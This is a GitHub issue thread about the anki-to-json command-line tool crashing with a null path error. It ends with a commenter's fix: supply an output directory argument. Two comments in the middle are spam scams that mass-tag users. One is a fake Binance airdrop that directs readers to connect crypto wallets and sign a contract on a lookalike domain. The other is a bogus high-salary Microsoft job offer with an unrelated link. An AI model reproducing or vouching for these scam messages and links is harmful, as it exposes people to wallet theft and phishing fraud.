### ISSUE TITLE
Running command from shell throws new ERR_INVALID_ARG_TYPE(propName, ['string', 'Buffer', 'URL'], path);

### ISSUE THREAD

**Issue by VogelAnt** [CraigglesO/anki-to-json#6]
Running
ankiToJson N2_Grammar.apkg

I get the following error:
node:internal/fs/utils:693
    throw new ERR_INVALID_ARG_TYPE(propName, ['string', 'Buffer', 'URL'], path);
    ^

TypeError [ERR_INVALID_ARG_TYPE]: The "path" argument must be of type string or an instance
of Buffer or URL. Received null
    at Object.mkdirSync (node:fs:1389:10)
    at ankiToJson (C:\Users\...\AppData\Roaming\npm\node_modules\anki-to-json\lib\index.js:1:1668)
    at Object.<anonymous> (C:\Users\...\AppData\Roaming\npm\node_modules\anki-to-json\bin\index.js:14:1)
    at Module._compile (node:internal/modules/cjs/loader:1254:14)
    at Module._extensions..js (node:internal/modules/cjs/loader:1308:10)
    at Module.load (node:internal/modules/cjs/loader:1117:32)
    at Module._load (node:internal/modules/cjs/loader:958:12)
    at Function.executeUserEntryPoint [as runMain] (node:internal/modules/run_main:81:12)
    at node:internal/main/run_main_module:23:47 {
  code: 'ERR_INVALID_ARG_TYPE'
}

using Node.js v18.15.0 on Win 10 vs code shell

**Comment by CraigglesO** [comment]
Hmm, sorry for the delay, would you able to share your anki deck with me so I can try to fix it? You can drag and drop the file into chat if it's small enough.

**Comment by itn-thomas** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @Ritech90, @israelts, @nebgem, @k-abacus, @opensourze, @drgomesp, @Matrix-Zhang, @ridersofrohan456, @uauwaw, @WieWatWanneer, @AndreMiras, @EronWright, @tarvos21, @johnpryan, @avelardi, @1337ninja, @sniper0110, @mubaris, @hipnologo, @ayay129, @toannhu96, @leopard627, @JeffMv, @thegeeksam, @tlaanemaa, @Tiezzzz03, @rene-m-hernandez, @denbon05, @JhnEngblm, @alexkarasyov

**Comment by justinvnextglobal** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online).

## Job Description:
- **Position:** Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan
  - Company-contributed retirement plan
  - Flexible working hours
  - Collaborative and inclusive work environment

## Requirements:
- Proven experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Familiarity with frameworks such as React, Angular, or Vue.js
- Problem-solving skills and ability to work in a team

**Note:** This position is open to candidates from anywhere in the world.
larinam, @kriptontr, @liangfm, @fortunto2, @hondziuuu, @jhonsu01, @merlex, @ray-learn, @chengjunjian, @owensoroke, @graycattus, @406345, @Cl3r1k, @Leadspie, @dongsam, @marktellez, @C-onnor, @bopjiang, @xussr, @woshibtb

**Comment by alexkhismatulin** [comment]
@VogelAnt probably not relevant anymore, but you need to pass output directory as a second parameter to the script as follows:
```
ankiToJson N2_Grammar.apkg output
```

@CraigglesO I've just opened a PR that updates the docs, take a look please.
